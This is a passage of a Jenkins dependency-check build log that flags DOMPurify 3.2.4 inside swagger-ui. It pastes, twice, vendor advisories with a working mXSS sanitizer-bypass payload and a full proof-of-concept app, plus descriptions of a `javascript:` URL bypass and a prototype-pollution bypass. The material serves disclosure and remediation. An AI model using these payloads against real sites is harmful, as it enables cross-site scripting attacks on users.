had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:43:33 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:43:33 [INFO] Analysis Complete (18 seconds) 17:43:33 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:43:33 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:43:33 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:43:33 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:43:33 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:43:33 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:43:33 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:43:33 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:43:33 [WARNING] 17:43:33 17:43:33 One or more dependencies were identified with known vulnerabilities in dependencies.swagger: 17:43:33 17:43:33 swagger-ui-5.24.1-1.jar: swagger-ui-bundle.js (pkg:javascript/DOMPurify@3.2.4) : ## Description 17:43:33 17:43:33 A mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC). 17:43:33 17:43:33 17:43:33 ## Vulnerability 17:43:33 17:43:33 The root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern). 17:43:33 17:43:33 ## PoC 17:43:33 17:43:33 1. Start the PoC app: 17:43:33 ```bash 17:43:33 npm install 17:43:33 npm start 17:43:33 ``` 17:43:33 17:43:33 2. Open `http://localhost:3001`. 17:43:33 3. Set `Wrapper en sink` to `xmp`. 17:43:33 4. Use payload: 17:43:33 ```html 17:43:33 <img src=x alt="</xmp><img src=x onerror=alert('expoc')>"> 17:43:33 ``` 17:43:33 17:43:33 5. Click `Sanitize + Render`. 17:43:33 6. Observe: 17:43:33 - `Sanitized response` still contains the `</xmp>` sequence inside `alt`. 17:43:33 - The sink reparses to include `<img src="x" onerror="alert('expoc')">`. 17:43:33 - `alert('expoc')` is triggered. 17:43:33 7. Files: 17:43:33 - index.html 17:43:33 17:43:33 ```html 17:43:33 <!doctype html> 17:43:33 <html lang="en"> 17:43:33 <head> 17:43:33 <meta charset="utf-8"> 17:43:33 <meta name="viewport" content="width=device-width, initial-scale=1"> 17:43:33 <title>expoc - DOMPurify SSR PoC</title> 17:43:33 <style> 17:43:33 :root { 17:43:33 --bg: #f7f8fb; 17:43:33 --panel: #ffffff; 17:43:33 --line: #d8dce6; 17:43:33 --text: #0f172a; 17:43:33 --muted: #475569; 17:43:33 --accent: #0ea5e9; 17:43:33 } 17:43:33 17:43:33 * { 17:43:33 box-sizing: border-box; 17:43:33 } 17:43:33 17:43:33 body { 17:43:33 margin: 0; 17:43:33 font-family: "SF Mono", Menlo, Consolas, monospace; 17:43:33 color: var(--text); 17:43:33 background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%); 17:43:33 } 17:43:33 17:43:33 main { 17:43:33 max-width: 980px; 17:43:33 margin: 28px auto; 17:43:33 padding: 0 16px 20px; 17:43:33 } 17:43:33 17:43:33 h1 { 17:43:33 margin: 0 0 10px; 17:43:33 font-size: 1.45rem; 17:43:33 } 17:43:33 17:43:33 p { 17:43:33 margin: 0; 17:43:33 color: var(--muted); 17:43:33 } 17:43:33 17:43:33 .grid { 17:43:33 display: grid; 17:43:33 gap: 14px; 17:43:33 margin-top: 16px; 17:43:33 } 17:43:33 17:43:33 .card { 17:43:33 background: var(--panel); 17:43:33 border: 1px solid var(--line); 17:43:33 border-radius: 12px; 17:43:33 padding: 14px; 17:43:33 } 17:43:33 17:43:33 label { 17:43:33 display: block; 17:43:33 margin-bottom: 7px; 17:43:33 font-size: 0.85rem; 17:43:33 color: var(--muted); 17:43:33 } 17:43:33 17:43:33 textarea, 17:43:33 input, 17:43:33 select, 17:43:33 button { 17:43:33 width: 100%; 17:43:33 border: 1px solid var(--line); 17:43:33 border-radius: 8px; 17:43:33 padding: 9px 10px; 17:43:33 font: inherit; 17:43:33 background: #fff; 17:43:33 } 17:43:33 17:43:33 textarea { 17:43:33 min-height: 110px; 17:43:33 resize: vertical; 17:43:33 } 17:43:33 17:43:33 .row { 17:43:33 display: grid; 17:43:33 grid-template-columns: 1fr 230px; 17:43:33 gap: 12px; 17:43:33 } 17:43:33 17:43:33 button { 17:43:33 cursor: pointer; 17:43:33 background: var(--accent); 17:43:33 color: #fff; 17:43:33 border-color: #0284c7; 17:43:33 } 17:43:33 17:43:33 #sink { 17:43:33 min-height: 90px; 17:43:33 border: 1px dashed #94a3b8; 17:43:33 border-radius: 8px; 17:43:33 padding: 10px; 17:43:33 background: #f8fafc; 17:43:33 } 17:43:33 17:43:33 pre { 17:43:33 margin: 0; 17:43:33 white-space: pre-wrap; 17:43:33 word-break: break-word; 17:43:33 } 17:43:33 17:43:33 .note { 17:43:33 margin-top: 8px; 17:43:33 font-size: 0.85rem; 17:43:33 } 17:43:33 17:43:33 .status-grid { 17:43:33 display: grid; 17:43:33 grid-template-columns: repeat(auto-fit, minmax(180px, 1fr)); 17:43:33 gap: 8px; 17:43:33 margin-top: 10px; 17:43:33 } 17:43:33 17:43:33 .status-item { 17:43:33 border: 1px solid var(--line); 17:43:33 border-radius: 8px; 17:43:33 padding: 8px 10px; 17:43:33 font-size: 0.85rem; 17:43:33 background: #fff; 17:43:33 } 17:43:33 17:43:33 .status-item.vuln { 17:43:33 border-color: #ef4444; 17:43:33 background: #fef2f2; 17:43:33 } 17:43:33 17:43:33 .status-item.safe { 17:43:33 border-color: #22c55e; 17:43:33 background: #f0fdf4; 17:43:33 } 17:43:33 17:43:33 @media (max-width: 760px) { 17:43:33 .row { 17:43:33 grid-template-columns: 1fr; 17:43:33 } 17:43:33 } 17:43:33 </style> 17:43:33 </head> 17:43:33 <body> 17:43:33 <main> 17:43:33 <h1>expoc - DOMPurify Server-Side PoC</h1> 17:43:33 <p> 17:43:33 Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML. 17:43:33 </p> 17:43:33 17:43:33 <div class="grid"> 17:43:33 <section class="card"> 17:43:33 <label for="payload">Payload</label> 17:43:33 <textarea id="payload"><img src=x alt="</script><img src=x onerror=alert('expoc')>"></textarea> 17:43:33 <div class="row" style="margin-top: 10px;"> 17:43:33 <div> 17:43:33 <label for="wrapper">Wrapper en sink</label> 17:43:33 <select id="wrapper"> 17:43:33 <option value="div">div</option> 17:43:33 <option value="textarea">textarea</option> 17:43:33 <option value="title">title</option> 17:43:33 <option value="style">style</option> 17:43:33 <option value="script" selected>script</option> 17:43:33 <option value="xmp">xmp</option> 17:43:33 <option value="iframe">iframe</option> 17:43:33 <option value="noembed">noembed</option> 17:43:33 <option value="noframes">noframes</option> 17:43:33 <option value="noscript">noscript</option> 17:43:33 </select> 17:43:33 </div> 17:43:33 <div style="display:flex;align-items:end;"> 17:43:33 <button id="run" type="button">Sanitize + Render</button> 17:43:33 </div> 17:43:33 </div> 17:43:33 <p class="note">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;' + sanitized + '&lt;/wrapper&gt;'</code>.</p> 17:43:33 <div class="status-grid"> 17:43:33 <div class="status-item vuln">script (vulnerable)</div> 17:43:33 <div class="status-item vuln">xmp (vulnerable)</div> 17:43:33 <div class="status-item vuln">iframe (vulnerable)</div> 17:43:33 <div class="status-item vuln">noembed (vulnerable)</div> 17:43:33 <div class="status-item vuln">noframes (vulnerable)</div> 17:43:33 <div class="status-item vuln">noscript (vulnerable)</div> 17:43:33 <div class="status-item safe">div (no vulnerable)</div> 17:43:33 <div class="status-item safe">textarea (no vulnerable)</div> 17:43:33 <div class="status-item safe">title (no vulnerable)</div> 17:43:33 <div class="status-item safe">style (no vulnerable)</div> 17:43:33 </div> 17:43:33 </section> 17:43:33 17:43:33 <section class="card"> 17:43:33 <label>Sanitized response</label> 17:43:33 <pre id="sanitized">(empty)</pre> 17:43:33 </section> 17:43:33 17:43:33 <section class="card"> 17:43:33 <label>Sink</label> 17:43:33 <div id="sink"></div> 17:43:33 </section> 17:43:33 </div> 17:43:33 </main> 17:43:33 17:43:33 <script> 17:43:33 const payload = document.getElementById('payload'); 17:43:33 const wrapper = document.getElementById('wrapper'); 17:43:33 const run = document.getElementById('run'); 17:43:33 const sanitizedNode = document.getElementById('sanitized'); 17:43:33 const sink = document.getElementById('sink'); 17:43:33 17:43:33 run.addEventListener('click', async () => { 17:43:33 const response = await fetch('/sanitize', { 17:43:33 method: 'POST', 17:43:33 headers: { 'Content-Type': 'application/json' }, 17:43:33 body: JSON.stringify({ input: payload.value }) 17:43:33 }); 17:43:33 17:43:33 const data = await response.json(); 17:43:33 const sanitized = data.sanitized || ''; 17:43:33 const w = wrapper.value; 17:43:33 17:43:33 sanitizedNode.textContent = sanitized; 17:43:33 sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>'; 17:43:33 }); 17:43:33 </script> 17:43:33 </body> 17:43:33 </html> 17:43:33 ``` 17:43:33 17:43:33 - server.js 17:43:33 17:43:33 ```js 17:43:33 const express = require('express'); 17:43:33 const path = require('path'); 17:43:33 const { JSDOM } = require('jsdom'); 17:43:33 const createDOMPurify = require('dompurify'); 17:43:33 17:43:33 const app = express(); 17:43:33 const port = process.env.PORT || 3001; 17:43:33 17:43:33 const window = new JSDOM('').window; 17:43:33 const DOMPurify = createDOMPurify(window); 17:43:33 17:43:33 app.use(express.json()); 17:43:33 app.use(express.static(path.join(__dirname, 'public'))); 17:43:33 17:43:33 app.get('/health', (_req, res) => { 17:43:33 res.json({ ok: true, service: 'expoc' }); 17:43:33 }); 17:43:33 17:43:33 app.post('/sanitize', (req, res) => { 17:43:33 const input = typeof req.body?.input === 'string' ? req.body.input : ''; 17:43:33 const sanitized = DOMPurify.sanitize(input); 17:43:33 res.json({ sanitized }); 17:43:33 }); 17:43:33 17:43:33 app.listen(port, () => { 17:43:33 console.log(`expoc running at http://localhost:${port}`); 17:43:33 }); 17:43:33 ``` 17:43:33 17:43:33 - package.json 17:43:33 17:43:33 ```json 17:43:33 { 17:43:33 "name": "expoc", 17:43:33 "version": "1.0.0", 17:43:33 "main": "server.js", 17:43:33 "scripts": { 17:43:33 "test": "echo \"Error: no test specified\" && exit 1", 17:43:33 "start": "node server.js", 17:43:33 "dev": "node server.js" 17:43:33 }, 17:43:33 "keywords": [], 17:43:33 "author": "", 17:43:33 "license": "ISC", 17:43:33 "description": "", 17:43:33 "dependencies": { 17:43:33 "dompurify": "^3.3.1", 17:43:33 "express": "^5.2.1", 17:43:33 "jsdom": "^28.1.0" 17:43:33 } 17:43:33 } 17:43:33 ``` 17:43:33 17:43:33 ## Evidence 17:43:33 17:43:33 - PoC 17:43:33 17:43:33 [daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90) 17:43:33 17:43:33 - XSS triggered 17:43:33 <img width="2746" height="1588" alt="daft-img" src="https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15" /> 17:43:33 17:43:33 ## Why This Happens 17:43:33 This is a mutation-XSS pattern caused by a parse-context mismatch: 17:43:33 17:43:33 - Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules. 17:43:33 - Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior). 17:43:33 - Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure. 17:43:33 17:43:33 Sanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk. 17:43:33 17:43:33 ## Remediation Guidance 17:43:33 1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`. 17:43:33 2. Keep the rendering context stable from sanitize to sink. 17:43:33 3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition. 17:43:33 4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.). 17:43:33 5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers). 17:43:33 17:43:33 Reported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1. 17:43:33 17:43:33 Following Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft 17:43:33 17:43:33 Acknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote)., ## Summary 17:43:33 DOMPurify allows `ADD_ATTR` to be provided as a predicate function via `EXTRA_ELEMENT_HANDLING.attributeCheck`. When the predicate returns `true`, `_isValidAttribute` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as `<a href="javascript:alert(document.domain)">` and have the `javascript:` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts `href` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass. 17:43:33 17:43:33 ## Impact 17:43:33 Predicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as `javascript:` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS. 17:43:33 17:43:33 ## Credits 17:43:33 Identified by Cantina’s Apex (https://www.cantina.security)., ## Summary 17:43:33 When `USE_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `<img onclick=...>` with `USE_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector. 17:43:33 17:43:33 ## Impact 17:43:33 Prototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered. 17:43:33 17:43:33 ## Credits 17:43:33 Identified by Cantina’s Apex (https://www.cantina.security). 17:43:33 swagger-ui-5.24.1-1.jar: swagger-ui-es-bundle.js (pkg:javascript/DOMPurify@3.2.4) : ## Description 17:43:33 17:43:33 A mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC). 17:43:33 17:43:33 17:43:33 ## Vulnerability 17:43:33 17:43:33 The root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern). 17:43:33 17:43:33 ## PoC 17:43:33 17:43:33 1. Start the PoC app: 17:43:33 ```bash 17:43:33 npm install 17:43:33 npm start 17:43:33 ``` 17:43:33 17:43:33 2. Open `http://localhost:3001`. 17:43:33 3. Set `Wrapper en sink` to `xmp`. 17:43:33 4. Use payload: 17:43:33 ```html 17:43:33 <img src=x alt="</xmp><img src=x onerror=alert('expoc')>"> 17:43:33 ``` 17:43:33 17:43:33 5. Click `Sanitize + Render`. 17:43:33 6. Observe: 17:43:33 - `Sanitized response` still contains the `</xmp>` sequence inside `alt`. 17:43:33 - The sink reparses to include `<img src="x" onerror="alert('expoc')">`. 17:43:33 - `alert('expoc')` is triggered. 17:43:33 7. Files: 17:43:33 - index.html 17:43:33 17:43:33 ```html 17:43:33 <!doctype html> 17:43:33 <html lang="en"> 17:43:33 <head> 17:43:33 <meta charset="utf-8"> 17:43:33 <meta name="viewport" content="width=device-width, initial-scale=1"> 17:43:33 <title>expoc - DOMPurify SSR PoC</title> 17:43:33 <style> 17:43:33 :root { 17:43:33 --bg: #f7f8fb; 17:43:33 --panel: #ffffff; 17:43:33 --line: #d8dce6; 17:43:33 --text: #0f172a; 17:43:33 --muted: #475569; 17:43:33 --accent: #0ea5e9; 17:43:33 } 17:43:33 17:43:33 * { 17:43:33 box-sizing: border-box; 17:43:33 } 17:43:33 17:43:33 body { 17:43:33 margin: 0; 17:43:33 font-family: "SF Mono", Menlo, Consolas, monospace; 17:43:33 color: var(--text); 17:43:33 background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%); 17:43:33 } 17:43:33 17:43:33 main { 17:43:33 max-width: 980px; 17:43:33 margin: 28px auto; 17:43:33 padding: 0 16px 20px; 17:43:33 } 17:43:33 17:43:33 h1 { 17:43:33 margin: 0 0 10px; 17:43:33 font-size: 1.45rem; 17:43:33 } 17:43:33 17:43:33 p { 17:43:33 margin: 0; 17:43:33 color: var(--muted); 17:43:33 } 17:43:33 17:43:33 .grid { 17:43:33 display: grid; 17:43:33 gap: 14px; 17:43:33 margin-top: 16px; 17:43:33 } 17:43:33 17:43:33 .card { 17:43:33 background: var(--panel); 17:43:33 border: 1px solid var(--line); 17:43:33 border-radius: 12px; 17:43:33 padding: 14px; 17:43:33 } 17:43:33 17:43:33 label { 17:43:33 display: block; 17:43:33 margin-bottom: 7px; 17:43:33 font-size: 0.85rem; 17:43:33 color: var(--muted); 17:43:33 } 17:43:33 17:43:33 textarea, 17:43:33 input, 17:43:33 select, 17:43:33 button { 17:43:33 width: 100%; 17:43:33 border: 1px solid var(--line); 17:43:33 border-radius: 8px; 17:43:33 padding: 9px 10px; 17:43:33 font: inherit; 17:43:33 background: #fff; 17:43:33 } 17:43:33 17:43:33 textarea { 17:43:33 min-height: 110px; 17:43:33 resize: vertical; 17:43:33 } 17:43:33 17:43:33 .row { 17:43:33 display: grid; 17:43:33 grid-template-columns: 1fr 230px; 17:43:33 gap: 12px; 17:43:33 } 17:43:33 17:43:33 button { 17:43:33 cursor: pointer; 17:43:33 background: var(--accent); 17:43:33 color: #fff; 17:43:33 border-color: #0284c7; 17:43:33 } 17:43:33 17:43:33 #sink { 17:43:33 min-height: 90px; 17:43:33 border: 1px dashed #94a3b8; 17:43:33 border-radius: 8px; 17:43:33 padding: 10px; 17:43:33 background: #f8fafc; 17:43:33 } 17:43:33 17:43:33 pre { 17:43:33 margin: 0; 17:43:33 white-space: pre-wrap; 17:43:33 word-break: break-word; 17:43:33 } 17:43:33 17:43:33 .note { 17:43:33 margin-top: 8px; 17:43:33 font-size: 0.85rem; 17:43:33 } 17:43:33 17:43:33 .status-grid { 17:43:33 display: grid; 17:43:33 grid-template-columns: repeat(auto-fit, minmax(180px, 1fr)); 17:43:33 gap: 8px; 17:43:33 margin-top: 10px; 17:43:33 } 17:43:33 17:43:33 .status-item { 17:43:33 border: 1px solid var(--line); 17:43:33 border-radius: 8px; 17:43:33 padding: 8px 10px; 17:43:33 font-size: 0.85rem; 17:43:33 background: #fff; 17:43:33 } 17:43:33 17:43:33 .status-item.vuln { 17:43:33 border-color: #ef4444; 17:43:33 background: #fef2f2; 17:43:33 } 17:43:33 17:43:33 .status-item.safe { 17:43:33 border-color: #22c55e; 17:43:33 background: #f0fdf4; 17:43:33 } 17:43:33 17:43:33 @media (max-width: 760px) { 17:43:33 .row { 17:43:33 grid-template-columns: 1fr; 17:43:33 } 17:43:33 } 17:43:33 </style> 17:43:33 </head> 17:43:33 <body> 17:43:33 <main> 17:43:33 <h1>expoc - DOMPurify Server-Side PoC</h1> 17:43:33 <p> 17:43:33 Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML. 17:43:33 </p> 17:43:33 17:43:33 <div class="grid"> 17:43:33 <section class="card"> 17:43:33 <label for="payload">Payload</label> 17:43:33 <textarea id="payload"><img src=x alt="</script><img src=x onerror=alert('expoc')>"></textarea> 17:43:33 <div class="row" style="margin-top: 10px;"> 17:43:33 <div> 17:43:33 <label for="wrapper">Wrapper en sink</label> 17:43:33 <select id="wrapper"> 17:43:33 <option value="div">div</option> 17:43:33 <option value="textarea">textarea</option> 17:43:33 <option value="title">title</option> 17:43:33 <option value="style">style</option> 17:43:33 <option value="script" selected>script</option> 17:43:33 <option value="xmp">xmp</option> 17:43:33 <option value="iframe">iframe</option> 17:43:33 <option value="noembed">noembed</option> 17:43:33 <option value="noframes">noframes</option> 17:43:33 <option value="noscript">noscript</option> 17:43:33 </select> 17:43:33 </div> 17:43:33 <div style="display:flex;align-items:end;"> 17:43:33 <button id="run" type="button">Sanitize + Render</button> 17:43:33 </div> 17:43:33 </div> 17:43:33 <p class="note">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;' + sanitized + '&lt;/wrapper&gt;'</code>.</p> 17:43:33 <div class="status-grid"> 17:43:33 <div class="status-item vuln">script (vulnerable)</div> 17:43:33 <div class="status-item vuln">xmp (vulnerable)</div> 17:43:33 <div class="status-item vuln">iframe (vulnerable)</div> 17:43:33 <div class="status-item vuln">noembed (vulnerable)</div> 17:43:33 <div class="status-item vuln">noframes (vulnerable)</div> 17:43:33 <div class="status-item vuln">noscript (vulnerable)</div> 17:43:33 <div class="status-item safe">div (no vulnerable)</div> 17:43:33 <div class="status-item safe">textarea (no vulnerable)</div> 17:43:33 <div class="status-item safe">title (no vulnerable)</div> 17:43:33 <div class="status-item safe">style (no vulnerable)</div> 17:43:33 </div> 17:43:33 </section> 17:43:33 17:43:33 <section class="card"> 17:43:33 <label>Sanitized response</label> 17:43:33 <pre id="sanitized">(empty)</pre> 17:43:33 </section> 17:43:33 17:43:33 <section class="card"> 17:43:33 <label>Sink</label> 17:43:33 <div id="sink"></div> 17:43:33 </section> 17:43:33 </div> 17:43:33 </main> 17:43:33 17:43:33 <script> 17:43:33 const payload = document.getElementById('payload'); 17:43:33 const wrapper = document.getElementById('wrapper'); 17:43:33 const run = document.getElementById('run'); 17:43:33 const sanitizedNode = document.getElementById('sanitized'); 17:43:33 const sink = document.getElementById('sink'); 17:43:33 17:43:33 run.addEventListener('click', async () => { 17:43:33 const response = await fetch('/sanitize', { 17:43:33 method: 'POST', 17:43:33 headers: { 'Content-Type': 'application/json' }, 17:43:33 body: JSON.stringify({ input: payload.value }) 17:43:33 }); 17:43:33 17:43:33 const data = await response.json(); 17:43:33 const sanitized = data.sanitized || ''; 17:43:33 const w = wrapper.value; 17:43:33 17:43:33 sanitizedNode.textContent = sanitized; 17:43:33 sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>'; 17:43:33 }); 17:43:33 </script> 17:43:33 </body> 17:43:33 </html> 17:43:33 ``` 17:43:33 17:43:33 - server.js 17:43:33 17:43:33 ```js 17:43:33 const express = require('express'); 17:43:33 const path = require('path'); 17:43:33 const { JSDOM } = require('jsdom'); 17:43:33 const createDOMPurify = require('dompurify'); 17:43:33 17:43:33 const app = express(); 17:43:33 const port = process.env.PORT || 3001; 17:43:33 17:43:33 const window = new JSDOM('').window; 17:43:33 const DOMPurify = createDOMPurify(window); 17:43:33 17:43:33 app.use(express.json()); 17:43:33 app.use(express.static(path.join(__dirname, 'public'))); 17:43:33 17:43:33 app.get('/health', (_req, res) => { 17:43:33 res.json({ ok: true, service: 'expoc' }); 17:43:33 }); 17:43:33 17:43:33 app.post('/sanitize', (req, res) => { 17:43:33 const input = typeof req.body?.input === 'string' ? req.body.input : ''; 17:43:33 const sanitized = DOMPurify.sanitize(input); 17:43:33 res.json({ sanitized }); 17:43:33 }); 17:43:33 17:43:33 app.listen(port, () => { 17:43:33 console.log(`expoc running at http://localhost:${port}`); 17:43:33 }); 17:43:33 ``` 17:43:33 17:43:33 - package.json 17:43:33 17:43:33 ```json 17:43:33 { 17:43:33 "name": "expoc", 17:43:33 "version": "1.0.0", 17:43:33 "main": "server.js", 17:43:33 "scripts": { 17:43:33 "test": "echo \"Error: no test specified\" && exit 1", 17:43:33 "start": "node server.js", 17:43:33 "dev": "node server.js" 17:43:33 }, 17:43:33 "keywords": [], 17:43:33 "author": "", 17:43:33 "license": "ISC", 17:43:33 "description": "", 17:43:33 "dependencies": { 17:43:33 "dompurify": "^3.3.1", 17:43:33 "express": "^5.2.1", 17:43:33 "jsdom": "^28.1.0" 17:43:33 } 17:43:33 } 17:43:33 ``` 17:43:33 17:43:33 ## Evidence 17:43:33 17:43:33 - PoC 17:43:33 17:43:33 [daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90) 17:43:33 17:43:33 - XSS triggered 17:43:33 <img width="2746" height="1588" alt="daft-img" src="https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15" /> 17:43:33 17:43:33 ## Why This Happens 17:43:33 This is a mutation-XSS pattern caused by a parse-context mismatch: 17:43:33 17:43:33 - Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules. 17:43:33 - Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior). 17:43:33 - Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure. 17:43:33 17:43:33 Sanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk. 17:43:33 17:43:33 ## Remediation Guidance 17:43:33 1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`. 17:43:33 2. Keep the rendering context stable from sanitize to sink. 17:43:33 3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition. 17:43:33 4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.). 17:43:33 5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers). 17:43:33 17:43:33 Reported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1. 17:43:33 17:43:33 Following Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft 17:43:33 17:43:33 Acknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote)., ## Summary 17:43:33 DOMPurify allows `ADD_ATTR` to be provided as a predicate function via `EXTRA_ELEMENT_HANDLING.attributeCheck`. When the predicate returns `true`, `_isValidAttribute` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as `<a href="javascript:alert(document.domain)">` and have the `javascript:` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts `href` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass. 17:43:33 17:43:33 ## Impact 17:43:33 Predicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as `javascript:` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS. 17:43:33 17:43:33 ## Credits 17:43:33 Identified by Cantina’s Apex (https://www.cantina.security)., ## Summary 17:43:33 When `USE_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via 